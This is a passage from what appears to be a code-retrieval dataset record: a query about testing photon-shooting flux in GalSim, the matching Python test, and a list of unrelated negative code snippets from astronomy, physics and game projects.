"0.4954187", "0.49480277", "0.4947991", "0.49470532", "0.49451295", "0.49338853", "0.49335906", "0.49304873", "0.49280733", "0.49232152", "0.492118", "0.49202713", "0.49163684", "0.49156007", "0.49133268", "0.49124014", "0.49124014", "0.490697", "0.49057528", "0.49057528", "0.4905614" ]
0.0
-1
Test Box with photon shooting. Particularly the flux of the final image.
def test_box_shoot():
    rng = galsim.BaseDeviate(1234)
    obj = galsim.Box(width=1.3, height=2.4, flux=1.e4)
    im = galsim.Image(100,100, scale=1)
    im.setCenter(0,0)
    added_flux, photons = obj.drawPhot(im, poisson_flux=False, rng=rng.duplicate())
    print('obj.flux = ',obj.flux)
    print('added_flux = ',added_flux)
    print('photon fluxes = ',photons.flux.min(),'..',photons.flux.max())
    print('image flux = ',im.array.sum())
    assert np.isclose(added_flux, obj.flux)
    assert np.isclose(im.array.sum(), obj.flux)
    photons2 = obj.makePhot(poisson_flux=False, rng=rng)
    assert photons2 == photons, "Box makePhot not equivalent to drawPhot"

    obj = galsim.Pixel(scale=9.3, flux=1.e4)
    added_flux, photons = obj.drawPhot(im, poisson_flux=False, rng=rng.duplicate())
    print('obj.flux = ',obj.flux)
    print('added_flux = ',added_flux)
    print('photon fluxes = ',photons.flux.min(),'..',photons.flux.max())
    print('image flux = ',im.array.sum())
    assert np.isclose(added_flux, obj.flux)
    assert np.isclose(im.array.sum(), obj.flux)
    photons2 = obj.makePhot(poisson_flux=False, rng=rng)
    assert photons2 == photons, "Pixel makePhot not equivalent to drawPhot"

    obj = galsim.TopHat(radius=4.7, flux=1.e4)
    added_flux, photons = obj.drawPhot(im, poisson_flux=False, rng=rng.duplicate())
    print('obj.flux = ',obj.flux)
    print('added_flux = ',added_flux)
    print('photon fluxes = ',photons.flux.min(),'..',photons.flux.max())
    print('image flux = ',im.array.sum())
    assert np.isclose(added_flux, obj.flux)
    assert np.isclose(im.array.sum(), obj.flux)
    photons2 = obj.makePhot(poisson_flux=False, rng=rng)
    assert photons2 == photons, "TopHat makePhot not equivalent to drawPhot"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_box():\n savedImg = galsim.fits.read(os.path.join(imgdir, \"box_1.fits\"))\n myImg = galsim.ImageF(savedImg.bounds, scale=0.2)\n myImg.setCenter(0,0)\n test_flux = 1.8\n\n pixel = galsim.Pixel(scale=1, flux=1)\n pixel.drawImage(myImg, method=\"sb\", use_true_center=False)\n np.testing.assert_array_almost_equal(\n myImg.array, savedImg.array, 5,\n err_msg=\"Using GSObject Pixel disagrees with expected result\")\n np.testing.assert_array_equal(\n pixel.scale, 1,\n err_msg=\"Pixel scale returned wrong value\")\n\n # Check with default_params\n pixel = galsim.Pixel(scale=1, flux=1, gsparams=default_params)\n pixel.drawImage(myImg, method=\"sb\", use_true_center=False)\n np.testing.assert_array_almost_equal(\n myImg.array, savedImg.array, 5,\n err_msg=\"Using GSObject Pixel with default_params disagrees with expected result\")\n pixel = galsim.Pixel(scale=1, flux=1, gsparams=galsim.GSParams())\n pixel.drawImage(myImg, method=\"sb\", use_true_center=False)\n np.testing.assert_array_almost_equal(\n myImg.array, savedImg.array, 5,\n err_msg=\"Using GSObject Pixel with GSParams() disagrees with expected result\")\n\n # Use non-unity values.\n pixel = galsim.Pixel(flux=1.7, scale=2.3)\n gsp = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n pixel2 = galsim.Pixel(flux=1.7, scale=2.3, gsparams=gsp)\n assert pixel2 != pixel\n assert pixel2 == pixel.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n\n # Test photon shooting.\n do_shoot(pixel,myImg,\"Pixel\")\n\n # Check picklability\n do_pickle(pixel, lambda x: x.drawImage(method='no_pixel'))\n do_pickle(pixel)\n do_pickle(galsim.Pixel(1))\n\n # Check that non-square Box profiles work correctly\n scale = 0.2939 # Use a strange scale here to make sure that the centers of the pixels\n # never fall on the box edge, otherwise it gets a bit weird to know what\n # the correct SB value is for that pixel.\n im = galsim.ImageF(16,16, scale=scale)\n gsp = galsim.GSParams(maximum_fft_size = 30000)\n for (width,height) in [ (3,2), (1.7, 2.7), (2.2222, 3.1415) ]:\n box = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp)\n check_basic(box, \"Box with width,height = %f,%f\"%(width,height))\n do_shoot(box,im,\"Box with width,height = %f,%f\"%(width,height))\n if __name__ == '__main__':\n # These are slow because they require a pretty huge fft.\n # So only do them if running as main.\n do_kvalue(box,im,\"Box with width,height = %f,%f\"%(width,height))\n cen = galsim.PositionD(0, 0)\n np.testing.assert_equal(box.centroid, cen)\n np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux)\n np.testing.assert_almost_equal(box.flux, test_flux)\n np.testing.assert_almost_equal(box.xValue(cen), box.max_sb)\n np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.-0.001), box.max_sb)\n np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.+0.001), 0.)\n np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.-0.001), 0.)\n np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.+0.001), 0.)\n np.testing.assert_array_equal(\n box.width, width,\n err_msg=\"Box width returned wrong value\")\n np.testing.assert_array_equal(\n box.height, height,\n err_msg=\"Box height returned wrong value\")\n\n gsp2 = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n box2 = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp2)\n assert box2 != box\n assert box2 == box.withGSParams(gsp2)\n assert box2 != box.withGSParams(xvalue_accuracy=1.e-8, 
kvalue_accuracy=1.e-8)\n assert box2.withGSParams(maximum_fft_size=30000) == box.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n\n # Check picklability\n do_pickle(box, lambda x: x.drawImage(method='no_pixel'))\n do_pickle(box)\n do_pickle(galsim.Box(1,1))\n\n # Check sheared boxes the same way\n box = galsim.Box(width=3, height=2, flux=test_flux, gsparams=gsp)\n box = box.shear(galsim.Shear(g1=0.2, g2=-0.3))\n check_basic(box, \"Sheared Box\", approx_maxsb=True)\n do_shoot(box,im, \"Sheared Box\")\n if __name__ == '__main__':\n do_kvalue(box,im, \"Sheared Box\")\n do_pickle(box, lambda x: x.drawImage(method='no_pixel'))\n do_pickle(box)\n cen = galsim.PositionD(0, 0)\n np.testing.assert_equal(box.centroid, cen)\n np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux)\n np.testing.assert_almost_equal(box.flux, test_flux)\n np.testing.assert_almost_equal(box.xValue(cen), box.max_sb)\n\n # This is also a profile that may be convolved using real space convolution, so test that.\n if __name__ == '__main__':\n conv = galsim.Convolve(box, galsim.Pixel(scale=scale), real_space=True)\n check_basic(conv, \"Sheared Box convolved with pixel in real space\",\n approx_maxsb=True, scale=0.2)\n do_kvalue(conv,im, \"Sheared Box convolved with pixel in real space\")\n do_pickle(conv, lambda x: x.xValue(0.123,-0.456))\n do_pickle(conv)", "def shoot(self):\n self.assertIsInstance(gun(3).shoot(), 2)\n self.assertIsInstance(gun(10).shoot(), 9)", "def shoot(self):\n if self.gun_interface:\n self.gun_interface.prepare_fire()", "def shoot(self):\n e = self.energy()\n y = self.rap()\n sqrt_pt2_m2 = e / math.cosh(y)\n pz = sqrt_pt2_m2 * math.sinh(y)\n m = self.mass()\n pt = math.sqrt( sqrt_pt2_m2**2 - m**2 )\n phi = self.phi()\n px = pt * math.cos(phi);\n py = pt * math.sin(phi);\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def execute(self, cast):\n bricks = cast[\"brick\"] # there's only one\n paddle = cast[\"paddle\"][0] # there's only one\n ball = cast[\"ball\"] [0]\n score = cast[\"score\"] [0]\n lives = cast[\"lives\"] [0]\n \n ball_v = ball.get_velocity()\n paddle_xy = paddle.get_position()\n ball_xy = ball.get_position()\n ball_vx = Point.get_x(ball_v) \n ball_vy = Point.get_y(ball_v)\n \n if Point.get_y(ball_xy) == 1:\n position = Point(ball_vx, 1)\n ball.set_velocity(position)\n \n if Point.get_x(ball_xy) <= 2:\n position = Point(1, ball_vy)\n ball.set_velocity(position)\n\n if Point.get_x(ball_xy) >= 78:\n position = Point(-1, ball_vy)\n ball.set_velocity(position)\n\n paddle_x = Point.get_x(paddle_xy)\n paddle_y = Point.get_y(paddle_xy)\n ball_x = Point.get_x(ball_xy)\n ball_y = Point.get_y(ball_xy)\n\n if ball_y == 18 and lives._lives == 0:\n print(\"\"\"\n ██╗░░░██╗░█████╗░██╗░░░██╗  ██╗░░░░░░█████╗░░██████╗███████╗  ██╗░░██╗\n ╚██╗░██╔╝██╔══██╗██║░░░██║  ██║░░░░░██╔══██╗██╔════╝██╔════╝  ╚═╝░██╔╝\n ░╚████╔╝░██║░░██║██║░░░██║  ██║░░░░░██║░░██║╚█████╗░█████╗░░  ░░░██╔╝░\n ░░╚██╔╝░░██║░░██║██║░░░██║  ██║░░░░░██║░░██║░╚═══██╗██╔══╝░░  ░░░╚██╗░\n ░░░██║░░░╚█████╔╝╚██████╔╝  ███████╗╚█████╔╝██████╔╝███████╗  ██╗░╚██╗\n ░░░╚═╝░░░░╚════╝░░╚═════╝░  ╚══════╝░╚════╝░╚═════╝░╚══════╝  ╚═╝░░╚═╝\"\"\")\n sys.exit()\n elif ball_y == 19 and lives._lives > 0:\n position = Point(ball_vx, -1)\n ball.set_velocity(position)\n lives._lives -= 1\n lives.set_text(f\"Lives: {lives._lives}\")\n\n for _ in range(1, 11):\n\n if paddle_x == ball_x and paddle_y -1 == ball_y or ball_vx == 3:\n if ball_vx == 1 or ball_vx == 2:\n ball_vx = random.randint(1,2)\n elif ball_vx == -1 or ball_vx == 
-2 or ball_vx == -3:\n ball_vx = random.randint(-2,-1)\n position = Point(ball_vx, -1)\n ball.set_velocity(position)\n paddle_x += 1\n \n i = 0\n\n for brick in bricks:\n position = brick.get_position()\n brick_x = Point.get_x(position)\n brick_y = Point.get_y(position)\n\n if brick_x == ball_x and brick_y == ball_y:\n bricks.pop(i)\n score._points +=1\n score.set_text(f\"Score: {score._points}\")\n if ball_vy == 1:\n ball_vy = -1\n elif ball_vy == -1:\n ball_vy = 1\n\n if ball_vx == 1:\n ball_velocity = Point(-1, ball_vy)\n else:\n ball_velocity = Point(1, ball_vy)\n ball.set_velocity(ball_velocity)\n\n i += 1", "def shoot(self):\n eta = self.eta()\n theta = 2 * math.atan(math.exp(-eta));\n e = self.energy()\n m = self.mass()\n p = math.sqrt( e**2 - m**2 )\n pz = p * math.cos(theta)\n pt = p * math.sin(theta)\n phi = self.phi()\n px = pt * math.cos(phi)\n py = pt * math.sin(phi)\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def maybe_shoot(self):\n res = self.space.segment_query_first((self.tank.body.position[0] - \\\n 0.6 * math.sin(self.tank.body.angle), self.tank.body.position[1] +\\\n 0.6 * math.cos(self.tank.body.angle)), (self.tank.body.position[0] -\\\n 10*math.sin(self.tank.body.angle), self.tank.body.position[1] + \\\n 10*math.cos(self.tank.body.angle)), 0, pymunk.ShapeFilter())\n if res is not None:\n try:\n if hasattr(res, 'shape'):\n if isinstance(res.shape.parent, gameobjects.Tank):\n bullet = self.tank.shoot(self.space)\n if bullet is not None:\n self.game_objects_list.append(bullet)\n elif isinstance(res.shape.parent, gameobjects.Box):\n if res.shape.parent.boxmodel.destructable is True:\n bullet = self.tank.shoot(self.space)\n if bullet is not None:\n self.game_objects_list.append(bullet)\n except:\n pass", "def shoot(self):\n pt = self.pt()\n assert pt >= 0\n m = self.mass()\n assert m >= 0\n sqrt_pt2_m2 = math.sqrt( pt**2 + m**2 )\n y = self.rap()\n e = sqrt_pt2_m2 * math.cosh(y)\n pz = sqrt_pt2_m2 * math.sinh(y)\n phi = self.phi()\n px = pt * math.cos(phi);\n py = pt * math.sin(phi);\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def shoot(self):\n eta = self.eta()\n theta = 2 * math.atan(math.exp(-eta));\n pt = self.pt()\n p = pt / math.sin(theta)\n phi = self.phi()\n px = pt * math.cos(phi)\n py = pt * math.sin(phi)\n pz = p * math.cos(theta)\n m = self.mass()\n e = math.sqrt( p**2 + m**2 )\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def start_shoot(self):\n shooter_state = String()\n shooter_state.data = \"shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Shooting\")", "def boltshoot(self):\n if self.input.is_key_down('spacebar'):\n self.getWave().boltInit()", "def burn_step(self):\n change = np.full((self.width, self.height), 0)\n for x in range(0, self.width - 1):\n for y in range(0, self.height - 1):\n # How fast we go through the fuel\n if random.randrange(2) == 0:\n self.fire_check_point(x, y, change)\n\n self.temp = np.maximum(change, self.temp)", "def ballchange(self):\r\n self.picture+=1\r\n self.image=pong2.bballs[self.picture]\r\n if self.image==pong2.zeus:\r\n wow=games.Message(value=\"YOU NEED TO GET A LIFE!!!\", size=75, color=color.white, left=5, top=5, lifetime=10*games.screen.fps, after_death=None, is_collideable=False)\r\n games.screen.add(wow)", "def shoot(self):\n e = self.energy()\n m = self.mass()\n p = math.sqrt( e**2 - m**2 )\n theta = self.theta()\n pz = p * math.cos(theta)\n pt = p * math.sin(theta)\n phi = self.phi()\n px = pt * 
math.cos(phi)\n py = pt * math.sin(phi)\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def shoot_boolet(self):\n angle = self.angle\n for i in range(3):\n bullet = BulletAlienDos(self.main_game, shooter=self.shooter)\n bullet.vector[0] = 0\n bullet.vector[1] = 1\n bullet.normalized_vector = bullet.vector.normalize()\n bullet.normalized_vector = bullet.normalized_vector.rotate(angle)\n angle -= self.angle\n self.main_game.alien_bullets.add(bullet)", "def shoot(self):\n return self.bot_client.send_command(_Command.Shoot)", "def __call__(self):\n return self.shoot()", "def test_fluxes(self):\n\n t, x_n, x_p, r_n, r_p = (\n self.t,\n self.x_n,\n self.x_p,\n self.r_n_edge,\n self.r_p_edge,\n )\n if self.model.options[\"particle\"] == \"uniform profile\":\n # Fluxes are zero everywhere since the concentration is uniform\n np.testing.assert_array_almost_equal(self.N_s_n(t, x_n, r_n), 0)\n np.testing.assert_array_almost_equal(self.N_s_p(t, x_p, r_p), 0)\n else:\n if self.operating_condition == \"discharge\":\n if self.model.options[\"particle\"] == \"quartic profile\":\n # quartic profile has a transient at the beginning where\n # the concentration \"rearranges\" giving flux of the opposite\n # sign, so ignore first three times\n np.testing.assert_array_less(0, self.N_s_n(t[3:], x_n, r_n[1:]))\n np.testing.assert_array_less(self.N_s_p(t[3:], x_p, r_p[1:]), 0)\n else:\n np.testing.assert_array_less(\n -1e-16, self.N_s_n(t[1:], x_n, r_n[1:])\n )\n np.testing.assert_array_less(self.N_s_p(t[1:], x_p, r_p[1:]), 1e-16)\n if self.operating_condition == \"charge\":\n np.testing.assert_array_less(self.N_s_n(t[1:], x_n, r_n[1:]), 1e-16)\n np.testing.assert_array_less(-1e-16, self.N_s_p(t[1:], x_p, r_p[1:]))\n if self.operating_condition == \"off\":\n np.testing.assert_array_almost_equal(self.N_s_n(t, x_n, r_n), 0)\n np.testing.assert_array_almost_equal(self.N_s_p(t, x_p, r_p), 0)\n\n np.testing.assert_array_almost_equal(0, self.N_s_n(t, x_n, r_n[0]), decimal=4)\n np.testing.assert_array_almost_equal(0, self.N_s_p(t, x_p, r_p[0]), decimal=4)", "def shoot(self):\n theta = self.theta()\n pt = self.pt()\n p = pt / math.sin(theta)\n phi = self.phi()\n px = pt * math.cos(phi)\n py = pt * math.sin(phi)\n pz = p * math.cos(theta)\n m = self.mass()\n e = math.sqrt( p**2 + m**2 )\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def shoot(self):\n if self.cool_down_counter == 0 and self.specialfire_state == False:\n BULLET_SOUND.play()\n bullet = Bullet(self.x+10, self.y, self.bullet_img)\n self.bullets.append(bullet)\n self.cool_down_counter = 1", "def bomb_vector(self):\n\n\t\tif self.b_offset == 0:\n\t\t\top = sin\n\t\telse:\n\t\t\top = cos\n\n\t\tself.y -= self.speed\n\t\tself.rect.y = self.y\n\t\t# MMMMMMMMMMMMMMMMMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATHS\n\t\tself.x = int((self.g_settings.screen_height/2) + self.amplitude*op(self.frequency*((float(self.y)/self.g_settings.screen_width)*(2*pi) + (self.speed*time()))))\n\t\tif self.b_offset == 0:\n\t\t\tself.rect.x = self.x + self.position_x - 16\n\t\telif self.b_offset == 1:\n\t\t\tself.rect.x = self.x + self.position_x + 16\n\t\tself.screen.blit(self.image, self.rect)", "def check_ball_on_target():\n\n pass", "def shoot(self):\n shots = Shooting(self.rect.centerx, self.rect.bottom)\n # Adding the shots to sprite lists created\n all_sprites_list.add(shots)\n shooting_list.add(shots)", "def shoot(self):\n if self.direction == 'left':\n 
self.__temp_bullet = Bullet(self.position, 60)\n elif self.direction == 'forward':\n self.__temp_bullet = Bullet(self.position, 90)\n else:\n self.__temp_bullet = Bullet(self.position, 120)\n global game\n game.sprites.add(self.__temp_bullet)\n game.bullets.add(self.__temp_bullet)\n game.fuel_bar.modify(-1)\n sounds['phaser'].play()", "def shoot(self):\r\n bullet = Bullet(self.rect.centerx, self.rect.top)\r\n ammo.add(bullet)", "def modify_box_coordinates(self, image, poles_detected):\n for window, poles in poles_detected.items():\n # Let's consider all poles detected on an image and modify their coordinates.\n # If only one pole's been detected, just widen the box 60% both sides\n if len(poles) == 1:\n new_left_boundary = int(poles[0].BB_left * 0.4)\n new_right_boundary = int(poles[0].BB_right * 1.6) if int(poles[0].BB_right * 1.6) <\\\n image.shape[1] else (image.shape[1] - 2)\n # Move upper border way up, often when a pole is close up many components do not get\n # included in the box, as a result they do not get found\n new_top_boundary = int(poles[0].BB_top * 0.1)\n new_bot_boundary = int(poles[0].BB_bottom * 1.1) if int(poles[0].BB_bottom * 1.1) <\\\n image.shape[0] else (image.shape[0] - 2)\n\n poles[0].update_object_coordinates(left=new_left_boundary,\n top=new_top_boundary,\n right=new_right_boundary,\n bottom=new_bot_boundary)\n else:\n for pole in poles:\n # If we've got 1+ poles on one frame or image, hence the shot was likely taken from\n # further distance.\n\n # TO DO: Overlapping check here. If BBs overlap and a component happens to be in between,\n # it will be detected twice\n\n new_left_boundary = int(pole.BB_left * 0.9)\n new_right_boundary = int(pole.BB_right * 1.1) if int(pole.BB_right * 1.1) < \\\n image.shape[1] else (image.shape[1] - 2)\n new_top_boundary = int(pole.BB_top * 0.5)\n new_bot_boundary = int(pole.BB_bottom * 1.1) if int(pole.BB_bottom * 1.1) < \\\n image.shape[0] else (image.shape[0] - 2)\n\n pole.update_object_coordinates(left=new_left_boundary,\n top=new_top_boundary,\n right=new_right_boundary,\n bottom=new_bot_boundary)", "def computeAndInsertBox(self,**kwargs):\n if self.predefined_box is None:\n self.mm.neglect()\n return\n (pose,new_frame) = self.baxter.frame.computeTransformation() \n if pose is None:\n self.mm.neglect()\n return\n \n try:\n side = kwargs['side']\n except Exception,e:\n rospy.logerr(\"%s\"%str(e))\n self.mm.neglect()\n return\n else:\n self.baxter.frame.setTF(self.predefined_box+'_'+side,pose)\n self.baxter.frame.waitUntilFrameUpdate(self.predefined_box+\"_\"+side)\n self.baxter.scene.createPredefinedBox(self.predefined_box+\"_\"+side,self.predefined_box)\n if self.learning:\n self.appendToTask(\"import tf_helper \\n\")\n self.appendToTask(\"side='%s'\\n\"%(side))\n self.appendToTask(\"baxter.bb.predefined_box='%s'\\n\"%(self.predefined_box))\n self.appendToTask(\"pose = tf_helper.PS('%s',%s,%s)\\n\"%(FRAME_ORIGIN,list(pose.pose.position),list(pose.pose.orientation)))\n self.appendToTask(\"baxter.frame.setTF('%s_'+side,pose)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.frame.waitUntilFrameUpdate('%s_'+side)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.scene.createPredefinedBox(baxter.bb.predefined_box+'_'+side,baxter.bb.predefined_box)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n self.appendToTask(\"for drop_off in baxter.scene.boxes[baxter.bb.predefined_box][1].keys():\\n\"%())\n 
self.appendToTask(\" pose = tf_helper.PS('%s_'+side,%s,%s)\\n\"%(self.predefined_box,\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][0:3]\",\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][3:7]\"))\n self.appendToTask(\" baxter.frame.setTF(drop_off+'_'+side,pose)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n for drop_off in self.baxter.scene.boxes[self.predefined_box][1].keys():\n pose = PS(self.predefined_box+'_'+side,self.baxter.scene.boxes[self.predefined_box][1][drop_off][0:3],self.baxter.scene.boxes[self.predefined_box][1][drop_off][3:7])\n self.baxter.frame.setTF(drop_off+'_'+side,pose)\n self.mm.confirm()", "def bfm_shoot_movement(self):\n\n # Move the feed motor forward, wait for it to get caught into the flywheels, then come back\n # Currently waiting 1.1 seconds each direction of the bfm movement\n # 2.2 seconds total\n # So wait (ROF-2.2)/2 in each direction and hope that the LAX ball has fallen by then\n\n if self.drill_name is not None:\n time.sleep((self.rof-2.2)/2)\n self.bfm.move_forward()\n self.bfm.move_backward()\n if self.drill_name is not None:\n time.sleep((self.rof-2.2)/2)", "def test_photon_flux_conversion(self):\n init_wl = np.linspace(300, 500, num=10)\n init_spec = np.ones(init_wl.shape)\n\n test_spec_base = Spectrum(init_wl, init_spec, 'nm', is_photon_flux=False)\n spectrum = test_spec_base.get_spectrum('nm', to_photon_flux=True)\n\n expect_spec = init_spec / (sc.h * sc.c / (init_wl*1e-9))\n\n assert np.all(np.isclose(spectrum[1, :], expect_spec))", "def test_empty_img():\n assert detected_boxes[-1] == ground_truth_boxes[-1]", "def testPeakLikelihoodFlux(self):\n # make mp: a flux measurer\n measControl = measAlg.PeakLikelihoodFluxControl()\n schema = afwTable.SourceTable.makeMinimalSchema()\n mp = measAlg.MeasureSourcesBuilder().addAlgorithm(measControl).build(schema)\n \n # make and measure a series of exposures containing just one star, approximately centered\n bbox = afwGeom.Box2I(afwGeom.Point2I(0, 0), afwGeom.Extent2I(100, 101))\n kernelWidth = 35\n var = 100\n fwhm = 3.0\n sigma = fwhm/FwhmPerSigma\n convolutionControl = afwMath.ConvolutionControl()\n psf = measAlg.SingleGaussianPsf(kernelWidth, kernelWidth, sigma)\n psfKernel = psf.getLocalKernel()\n psfImage = psf.computeKernelImage()\n sumPsfSq = numpy.sum(psfImage.getArray()**2)\n psfSqArr = psfImage.getArray()**2\n for flux in (1000, 10000):\n ctrInd = afwGeom.Point2I(50, 51)\n ctrPos = afwGeom.Point2D(ctrInd)\n\n kernelBBox = psfImage.getBBox(afwImage.PARENT)\n kernelBBox.shift(afwGeom.Extent2I(ctrInd))\n\n # compute predicted flux error\n unshMImage = makeFakeImage(bbox, [ctrPos], [flux], fwhm, var)\n\n # filter image by PSF\n unshFiltMImage = afwImage.MaskedImageF(unshMImage.getBBox(afwImage.PARENT))\n afwMath.convolve(unshFiltMImage, unshMImage, psfKernel, convolutionControl)\n \n # compute predicted flux = value of image at peak / sum(PSF^2)\n # this is a sanity check of the algorithm, as much as anything\n predFlux = unshFiltMImage.getImage().get(ctrInd[0], ctrInd[1]) / sumPsfSq\n self.assertLess(abs(flux - predFlux), flux * 0.01)\n \n # compute predicted flux error based on filtered pixels\n # = sqrt(value of filtered variance at peak / sum(PSF^2)^2)\n predFluxErr = math.sqrt(unshFiltMImage.getVariance().get(ctrInd[0], ctrInd[1])) / sumPsfSq\n\n # compute predicted flux error based on unfiltered pixels\n # = sqrt(sum(unfiltered variance * PSF^2)) / sum(PSF^2)\n # and 
compare to that derived from filtered pixels;\n # again, this is a test of the algorithm\n varView = afwImage.ImageF(unshMImage.getVariance(), kernelBBox)\n varArr = varView.getArray()\n unfiltPredFluxErr = math.sqrt(numpy.sum(varArr*psfSqArr)) / sumPsfSq\n self.assertLess(abs(unfiltPredFluxErr - predFluxErr), predFluxErr * 0.01)\n \n for fracOffset in (afwGeom.Extent2D(0, 0), afwGeom.Extent2D(0.2, -0.3)):\n adjCenter = ctrPos + fracOffset\n if fracOffset == (0, 0):\n maskedImage = unshMImage\n filteredImage = unshFiltMImage\n else:\n maskedImage = makeFakeImage(bbox, [adjCenter], [flux], fwhm, var)\n # filter image by PSF\n filteredImage = afwImage.MaskedImageF(maskedImage.getBBox(afwImage.PARENT))\n afwMath.convolve(filteredImage, maskedImage, psfKernel, convolutionControl)\n\n exposure = afwImage.makeExposure(filteredImage)\n exposure.setPsf(psf)\n \n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, exposure, afwGeom.Point2D(*adjCenter))\n measFlux = source.get(measControl.name)\n measFluxErr = source.get(measControl.name + \".err\")\n self.assertFalse(source.get(measControl.name + \".flags\"))\n self.assertLess(abs(measFlux - flux), flux * 0.003)\n \n self.assertLess(abs(measFluxErr - predFluxErr), predFluxErr * 0.2)\n\n # try nearby points and verify that the flux is smaller;\n # this checks that the sub-pixel shift is performed in the correct direction\n for dx in (-0.2, 0, 0.2):\n for dy in (-0.2, 0, 0.2):\n if dx == dy == 0:\n continue\n offsetCtr = afwGeom.Point2D(adjCenter[0] + dx, adjCenter[1] + dy)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, exposure, offsetCtr)\n offsetFlux = source.get(measControl.name)\n self.assertLess(offsetFlux, measFlux)\n \n # source so near edge of image that PSF does not overlap exposure should result in failure\n \n for edgePos in (\n (1, 50),\n (50, 1),\n (50, bbox.getHeight() - 1),\n (bbox.getWidth() - 1, 50),\n ):\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, exposure, afwGeom.Point2D(*edgePos))\n self.assertTrue(source.get(measControl.name + \".flags\"))\n \n # no PSF should result in failure: flags set\n noPsfExposure = afwImage.ExposureF(filteredImage)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, noPsfExposure, afwGeom.Point2D(*adjCenter))\n self.assertTrue(source.get(measControl.name + \".flags\"))", "def shoot(state, power):\n return kickAt(state, state.opp_goal, power)", "def shooting(agent):\n ball = agent.info.ball\n car = agent.info.my_car\n our_goal = agent.my_goal.center\n target = shooting_target(agent)\n agent.drive.target = target\n distance = distance_2d(car.location, target)\n vf = velocity_forward(car)\n dodge_overshoot = distance < (abs(vf) + 500) * 1.4\n #agent.drive.speed = get_speed(agent, target)\n agent.drive.speed = 2200\n agent.drive.step(agent.info.time_delta)\n agent.controls = agent.drive.controls\n if agent.defending:\n agent.step = Step.Defending\n elif should_dodge(agent):\n agent.step = Step.Dodge\n agent.dodge = Dodge(car)\n agent.dodge.duration = 0.1\n agent.dodge.target = ball.location\n elif agent.ball_bouncing and not (abs(ball.velocity[2]) < 100\n and sign(agent.team) * ball.velocity[1] < 0) and get_bounce(agent) is not None:\n agent.step = Step.Catching\n agent.drive.target = ball.location\n agent.drive.speed = 1399\n elif vf < -900 and (not dodge_overshoot or distance < 600):\n agent.step = Step.HalfFlip\n agent.halfflip = 
HalfFlip(car)\n elif not dodge_overshoot and car.location[2] < 80 and\\\n (agent.drive.speed > abs(vf) + 300 and 1200 < abs(vf) < 2000 and car.boost <= 15):\n # Dodge towards the target for speed\n agent.step = Step.Dodge\n agent.dodge = Dodge(car)\n agent.dodge.duration = 0.1\n agent.dodge.target = target", "def test_boxnet(self):\n\t\timg = np.random.rand(2, 3, 256, 128)\n\t\t\n\t\tvgg = VGGNet()\n\t\tboxnet = BoxNet()\n\n\t\tfm = vgg(img)\n\t\tboxes = boxnet(fm)\n\n\t\tnp.testing.assert_equal(boxes.shape, (2,6,256/2**4,128/2**4))\n\n\t\t\"\"\" Dimension check with random shifts \"\"\"\n\n\t\t\"\"\" Visualize boxes with random shifts \"\"\"", "def shootProjectile(configuration):\n leftData, rightData = getArrowData(configuration)\n return leftData[0] > 0 or rightData[0] > 0", "def boxer(imgfile, parttree, outstack, boxsize):\n imgarray = mrc.read(imgfile)\n boxedparticles = boxerMemory(imgarray, parttree, boxsize)\n apImagicFile.writeImagic(boxedparticles, outstack)\n return True", "def spinUpBatter(self):\n self.setVelocity(config.batterShootSpeed)", "def interaction_box(self) -> None:\n assert(0 <= self.target.x_obj+self.d_x <= self.grid.width and 0 <=\n self.target.y_obj+self.d_y <= self.grid.height)\n x_beyond_target = self.target.x_obj + self.d_x\n y_beyond_target = self.target.y_obj + self.d_y\n beyond_target = self.grid.obj_list[ # Object on which we could push the box\n x_beyond_target, y_beyond_target]\n if isinstance(beyond_target, ob.Void): # Simply pushing the box\n self.grid.obj_list.swap_obj(beyond_target, self.target)\n self.grid.obj_list.swap_obj(beyond_target, self.moving_character)\n elif isinstance(beyond_target, ob.Hole):\n if beyond_target.depth == 1:\n # Destroying box and hole\n void1 = ob.Void(self.target.x_obj, self.target.y_obj)\n void2 = ob.Void(x_beyond_target, y_beyond_target)\n self.grid.obj_list[self.target] = void1\n self.grid.obj_list[beyond_target] = void2\n # Then moving character\n self.grid.obj_list.swap_obj(void1, self.moving_character)\n else:\n # Reducing depth of the hole\n beyond_target.reduce_depth()\n # Destructing the box\n void = 